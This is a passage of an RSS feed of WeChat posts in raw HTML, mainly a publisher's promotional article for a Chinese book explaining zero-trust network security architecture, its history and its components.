0px;"/></section></section><section style="margin: 0px;padding: 0px;line-height: 1.75em;text-align: center;"><br style="margin: 0px;padding: 0px;"/></section><section style="margin: 0px;padding: 0px;letter-spacing: 0.544px;line-height: 1.75em;text-align: center;"><span style="margin: 0px;padding: 0px;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);">在公众号对话框</span><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);font-size: 12px;max-width: 100%;caret-color: red;">输入以下</span><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">关键词</span></strong></span></span></section><section style="margin: 0px;padding: 0px;letter-spacing: 0.544px;line-height: 1.75em;text-align: center;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);letter-spacing: normal;">查看更多优质内容！</span></section><section style="margin: 0px;padding: 0px;letter-spacing: 0.544px;line-height: 1.75em;text-align: center;"><br style="margin: 0px;padding: 0px;"/></section><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;letter-spacing: 0.544px;"><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;"><section style="margin: 0px;padding: 0px;line-height: 1.75em;text-align: center;"><span style="margin: 0px;padding: 0px;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">读书</span></strong></span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);">书单</span></strong><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(127, 127, 127);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">干货</span></strong></span><strong style="margin: 0px;padding: 0px;color: rgb(73, 59, 59);caret-color: red;"><span style="margin: 0px;padding: 0px;font-size: 15px;max-width: 100%;"><strong style="margin: 0px;padding: 0px;font-size: 16px;"><span style="margin: 0px;padding: 0px;max-width: 100%;"> </span></strong></span></strong><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);">|</span><span style="margin: 0px;padding: 0px;font-size: 15px;max-width: 100%;"> </span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;">讲明白<strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;"> </span></strong></strong><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;color: rgb(127, 127, 127);">|</span><strong style="margin: 0px;padding: 0px;"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;"> </span></strong><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">神操作 | </span></strong></span></strong><strong style="margin: 0px;padding: 0px;">手把手</strong></span></span></section><section style="margin: 0px;padding: 0px;line-height: 1.75em;text-align: center;"><span style="margin: 0px;padding: 0px;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">大数据</span></strong></span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);">云计算</span></strong><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;">数据库</strong></span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">Python</span></strong></span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">爬虫</span></strong></span></strong></span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">可视化</span></strong></span></span></section><section style="margin: 0px;padding: 0px;line-height: 1.75em;text-align: center;"><span style="margin: 0px;padding: 0px;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">AI</span></strong></span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);">人工智能</span></strong><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">机器学习</span></strong></span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">深度学习</span></strong></span><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> | </span><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);">NLP</span></strong></span></section><section style="margin: 0px;padding: 0px;line-height: 1.75em;text-align: center;"><span style="margin: 0px;padding: 0px;letter-spacing: normal;"><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">5G</span></strong></span></strong></span><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(127, 127, 127);max-width: 100%;caret-color: red;"> </span></strong><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(127, 127, 127);max-width: 100%;caret-color: red;">|</span><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;"> </span><span style="margin: 0px;padding: 0px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">中台 </span></strong></span></span></strong><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);max-width: 100%;caret-color: red;font-size: 12px;">|</span><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;"> 用户画像</span></strong></span></strong><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);"> </span></strong><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 12px;color: rgb(127, 127, 127);">| </span><span style="margin: 0px;padding: 0px;font-size: 12px;color: rgb(0, 122, 170);"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">数学 </span></strong><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;color: rgb(127, 127, 127);">|</span><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;color: rgb(127, 127, 127);"> 算法 </span></strong><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;color: rgb(127, 127, 127);">| </span><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;">数字孪生</span></strong></span></span></section></section></section><section style="margin: 0px;padding: 0px;letter-spacing: 0.544px;line-height: 1.75em;text-align: center;"><br style="margin: 0px;padding: 0px;"/></section><section style="margin: 0px;padding: 0px;letter-spacing: 0.544px;line-height: 1.75em;text-align: center;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 14px;color: rgb(127, 127, 127);letter-spacing: normal;">据统计，99%的大咖都关注了这个公众号</span></section><section style="margin: 0px;padding: 0px;letter-spacing: 0.544px;line-height: 1.75em;text-align: center;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 14px;color: rgb(127, 127, 127);letter-spacing: normal;"><strong style="margin: 0px;padding: 0px;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;letter-spacing: 0.5px;"><span style="margin: 0px;padding: 0px;max-width: 100%;caret-color: red;font-size: 15px;color: rgb(0, 122, 170);">👇</span></strong></span></section></section></section></section></section><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.848" data-s="300,640" style="" data-type="png" data-w="1125" src="https://wechat2rss.xlab.app/img-proxy/?k=2dbf6326&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdG74lzLxUJkuKUlPTWAckh9dJ2TxuH8cJCd6JCGzB4T3AnlvkjzctWTvcicu7zG4C0vdgfAmg8Cpng%2F640%3Fwx_fmt%3Djpeg"/></p><section style="margin: 16px auto;padding: 0px;text-align: center;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;font-size: 0px;"><br/></section>



<p><a href="https://item.jd.com/13197187.html">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=cef1a1d5&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485718%26idx%3D1%26sn%3D83afc291c76a0f9614181975b13959cc%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 15 Aug 2022 21:14:00 +0800</pubDate>
    </item>
    <item>
      <title>有趣有料！一次零信任网络安全架构的认知升级（文末抽奖）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485712&amp;idx=1&amp;sn=c97df984f221fbce48d898e3f0bf7f0f</link>
      <description>当下最受认可的安全架构！</description>
      <content:encoded><![CDATA[<p>
<span></span> <span>2022-08-01 15:22</span> <span style="display: inline-block;">北京</span>
</p>

<p>当下最受认可的安全架构！</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=90c74a1b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FPW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qenHEu1OSR9rEqjTBCdaWic8ickAFKhO3z8haTl5ph6t5ibXLhfVEGBdl2A%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-role="outer" label="edit by 135editor" data-mpa-powered-by="yiban.io"><p style="text-align:center;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="letter-spacing: 0.544px;text-align: center;caret-color: red;outline-style: initial;max-width: 100%;color: rgb(73, 73, 73);font-size: 11pt;visibility: visible;font-family: Helvetica, Arial, sans-serif;">👆</span><span style="letter-spacing: 0.544px;text-align: center;caret-color: red;outline-style: initial;max-width: 100%;font-size: 12px;color: rgb(98, 90, 90);visibility: visible;font-family: Helvetica, Arial, sans-serif;">点击“</span><span style="letter-spacing: 0.544px;text-align: center;caret-color: red;outline-style: initial;max-width: 100%;color: rgb(0, 122, 170);font-size: 12px;visibility: visible;font-family: Helvetica, Arial, sans-serif;">博文视点Broadview</span><span style="letter-spacing: 0.544px;text-align: center;caret-color: red;outline-style: initial;max-width: 100%;font-size: 12px;color: rgb(98, 90, 90);visibility: visible;font-family: Helvetica, Arial, sans-serif;">”，获取更多书讯</span></p><p style="text-align:center;margin: 0px 0px 0em;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;color: rgb(34, 34, 34);font-size: 17px;letter-spacing: 0.544px;vertical-align: inherit;visibility: visible;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: -apple-system, BlinkMacSystemFont, Arial, sans-serif;"><img class="rich_pages wxw-img" data-ratio="0.05669291338582677" data-s="300,640" style="max-width: 100% !important;box-sizing:border-box;margin: 0px;padding: 0px;outline: 0px;vertical-align: inherit;display: inline;width: 100%;overflow-wrap: break-word !important;height: auto !important;visibility: visible !important;" data-type="png" data-w="635" src="https://wechat2rss.xlab.app/img-proxy/?k=f8d8762a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FPW0wIHxgg3nr1VNxfeqxVOw2nPJHVH4xeZibzPY5F4ibOuOZLMsUMrzIibGB6KMw7EurSKv6DkrtLzuhYdBa30A9Q%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align:justify;margin: 20px 8px;line-height: 1.75em;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">所有伟大的技术变革都是顺应时代发展的潮流而生的。</span></p><p style="text-align:justify;margin: 20px 8px;line-height: 1.75em;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">随着云计算和移动办公时代的到来，</span><span style="color: #E36C09;"><strong><span style="font-size: 15px;letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">传统安全模式已经渐渐失效，“零信任”成为当下最受认可的安全架构。</span></strong></span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">传统的安全模式以边界防御为中心，在边界处部署防火墙、WAF、IPS等网络安全产品进行防御，通过建设一层一层的“城墙”，将可信的内网和不可信的外网隔离开。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">然而，随着移动办公的兴起、APT攻击的泛滥，原本清晰的网络边界已经逐渐模糊。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">网络攻击可能源自内部。黑客通过入侵用户设备、窃取身份，长期潜伏在企业内部网络，传播风险，给企业带来巨大的安全威胁。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: #E36C09;font-size: 17px;"><strong><span style="color: rgb(227, 108, 9);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">零信任</span></strong></span><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">就是在这个背景下应运而生的。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">零信任的理念是<span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;text-shadow: rgb(250, 192, 143) 0px 0px 8px;font-family: Helvetica, Arial, sans-serif;">“持续验证，永不信任” </span>，授权不再以网络边界为中心，而是以身份和数据为中心，进行动态授权。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">零信任网络中默认拒绝一切。无论什么类型的用户和资源，无论处于什么位置，在进行严格的身份验证和授权之前，不允许访问任何资源。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">就像防疫政策一样，当我们面对的是传播力更强的奥密克戎病毒时，不仅要在大楼的出入口测温，还要对每个人进行持续的验证，检查每个人是否与病毒携带者有过时空伴随，是否去过高风险地区，是否打了疫苗等等。只有做到对每个人的“零信任”，才能有效对抗威胁。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">零信任架构已经得到了主流市场的广泛认可，未来两年内仍未采用的企业会感到落后的压力。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">谷歌是最早采用零信任架构的公司，目前已有超过10万名员工都在通过谷歌的零信任系统BeyondCorp进行日常办公。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">著名咨询机构Gartner认为未来几年内将有80%的面向生态合作伙伴的新数字业务应用采用零信任网络访问。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">2021年，美国总统拜登签署行政令要求政府各级部门落实零信任技术。美国国防部发布了他们的零信任参考架构。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">零信任安全架构已经引起了国家相关部门和业界的高度重视。2019年，工信部发布了《关于促进网络安全产业发展的指导意见》，将零信任安全列为网络安全需要突破的关键技术。中国信通院发布了《中国网络安全产业白皮书（2019年）》，将零信任安全技术列为我国网络安全重点细分领域技术。不少政府单位、大中型企业已经开始研究零信任架构的落地问题。国内正在兴起一股零信任的建设热潮。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: #E36C09;"><strong><span style="font-size: 15px;letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">很多刚接触零信任的人会感觉“看不懂”零信任。</span></strong></span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">如果你在网上浏览零信任的资料，你就会发现，各个机构的零信任模型不同，各个厂商的解决方案也各不相同。行业内各家自说自话，令人摸不着头脑，看不明白到底什么才是零信任。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">因此，推荐这本</span><span style="color: #E36C09;"><strong><span style="font-size: 15px;letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">《白话零信任》</span></strong></span><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">给大家。</span></p><p style="text-align:center;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"><img class="rich_pages wxw-img" data-ratio="1" width="261" data-type="png" data-w="800" data-width="261px" style="box-sizing:border-box;vertical-align: inherit;width: 261px;" src="https://wechat2rss.xlab.app/img-proxy/?k=9a81434c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FPW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qeiaNxlyMYnwY9gwt8mqXC7zYzCKe0xiaH9a6hAElOjFdsONfVLTotjznw%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align:center;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"><br/></span></p><section data-role="title" data-tools="135编辑器" data-id="113244"><section style="margin: 20px auto;"><section style="display: flex;justify-content: center;" hm_fix="203:444"><section style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/PW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qesY5GJr7iaSz7nQXXO3FOEfqTYJe2GIDsCTbag7ibW1vO3K6LJ8vZsW3g/640?wx_fmt=png&#34;) center center / 100% no-repeat;height: 35px;margin-left: -15px;transform: translateZ(4px);"><section style="font-size: 16px;color: rgb(255, 255, 255);text-align: center;padding: 0px 30px;line-height: 32px;box-sizing: border-box;"><strong data-brushtype="text">本书讲了什么</strong></section></section></section></section></section><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">这本书从头开始，把历史上零信任的每个流派都梳理了一遍，盘点了各家的行业标准和技术框架。</span><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"></span></p><section data-role="list"><ul class="list-paddingleft-1" style="list-style-type: disc;margin: 0px;padding: 0px 0px 0px 30px;"><li><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">从Forrester的概念模型，到BeyondCorp的最佳实践。</span></p></li><li><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">从NIST的技术标准，到国内外各大厂商的特色解决方案</span></p></li><li><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">……</span></p></li></ul></section><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">本书提供了一个全局视角，以便读者可以俯视百花齐放的市场现状。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">另外，所有人都知道“零信任”是一种整体的网络安全架构。但实际上，市场上大多数零信任产品只是一个加强版的VPN。很多人只能看到零信任的冰山一角，而看不到 “全貌”。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">《白话零信任》书中总结了完整的零信任模型，并且结合很多大型企业的整体建设、改造经验，试图展现出零信任架构的全貌，而不止是浮出水面的部分。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: #E36C09;"><strong><span style="font-size: 15px;letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">零信任有“7大维度”——数据、用户、设备、工作负载、网络、可见性与分析、自动化和编排。</span></strong></span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">就像谷歌的安全实践中，不只有BeyondCorp替代VPN。还有身份大数据、设备清单库的建立；有BeyondProd来做“从前置应用、到后置服务、到数据”整个流程前后关联的访问控制；有从底层硬件、到操作系统、到代码构建层层渗透的身份认证……</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">一个用户查看Gmail里的日历信息时，数据服务不仅要考察Gmail服务器是否合法，还要检查终端用户是否合法，用户的操作是否有必要驱动后端服务的调用，调用API的服务器上运行的代码是否可信等等。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: #E36C09;font-size: 17px;"><strong><span style="color: rgb(227, 108, 9);letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">总的来说，</span></strong></span><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">本书主要介绍了零信任在国内国外的发展历史，国内的市场现状、完整的零信任架构，深入解析8大技术组件，从攻防角度总结了零信任应对各类安全威胁的防御手段，介绍了24种各具特色的应用场景。通过4个典型案例的落地效果和实施经验，从建设视角、运营视角介绍了如何根据实际情况，规划、建设零信任网络，如何使用零信任，利用零信任进行整体安全运营。</span><br/></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><br/></p><section data-role="title" data-tools="135编辑器" data-id="113244"><section style="margin: 20px auto;"><section style="display: flex;justify-content: center;" hm_fix="199:439"><section style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/PW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qesY5GJr7iaSz7nQXXO3FOEfqTYJe2GIDsCTbag7ibW1vO3K6LJ8vZsW3g/640?wx_fmt=png&#34;) center center / 100% no-repeat;height: 35px;margin-left: -15px;transform: translateZ(4px);"><section style="font-size: 16px;color: rgb(255, 255, 255);text-align: center;padding: 0px 30px;line-height: 32px;box-sizing: border-box;"><strong data-brushtype="text">本书特色</strong></section></section></section></section></section><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: #E36C09;"><em><strong><span style="letter-spacing: 1px;caret-color: red;font-size: 28px;font-family: Helvetica, Arial, sans-serif;">01.</span></strong></em></span><em><strong><span style="color: rgb(59, 59, 59);letter-spacing: 1px;caret-color: red;font-size: 28px;font-family: Helvetica, Arial, sans-serif;"> </span></strong></em><span style="font-size: 17px;"><strong><span style="color: rgb(59, 59, 59);letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">全面</span></strong></span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">结合作者多年的实践经验，盘点了零信任历史上的5大流派，梳理了零信任的8大核心组件和24个各具特色的应用场景，通过综合对比，做出更全面的分析解读。</span><br/></p><p style="text-align:center;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;"><img class="rich_pages wxw-img" data-ratio="0.5388888888888889" style="max-width: 